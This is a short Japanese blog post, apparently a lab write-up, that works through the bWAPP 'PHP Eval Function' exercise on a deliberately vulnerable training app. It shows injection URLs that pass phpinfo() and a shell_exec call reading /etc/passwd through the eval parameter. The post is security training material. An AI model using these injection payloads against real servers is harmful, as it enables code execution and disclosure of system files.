Shikata Ga Nai

Private? There is no such things.

bWAPPでA9-PHP Eval Function

bWAPP

Hello there, ('ω')ノ

 

こちらのメニューもやっていなかったので。

 

f:id:ThisIsOne:20201028153939p:plain

 

eval関数は、引数の文字列をPHPコードとして実行するので。

例えば、下記のサイトを参考にして。

 https://www.exploit-db.com/papers/13694

 

f:id:ThisIsOne:20201028152813p:plain

 

下記のように引数を渡すと。

 http://10.4.128.57/bWAPP/php_eval.php?eval=phpinfo();

 

f:id:ThisIsOne:20201028152208p:plain

 

さらには、下記のような引数でも。

 http://10.4.128.57/bWAPP/php_eval.php?eval=echo%20shell_exec(%22cat%20/etc/passwd%22);

 

f:id:ThisIsOne:20201028153230p:plain

 

Best regards, (^^ゞ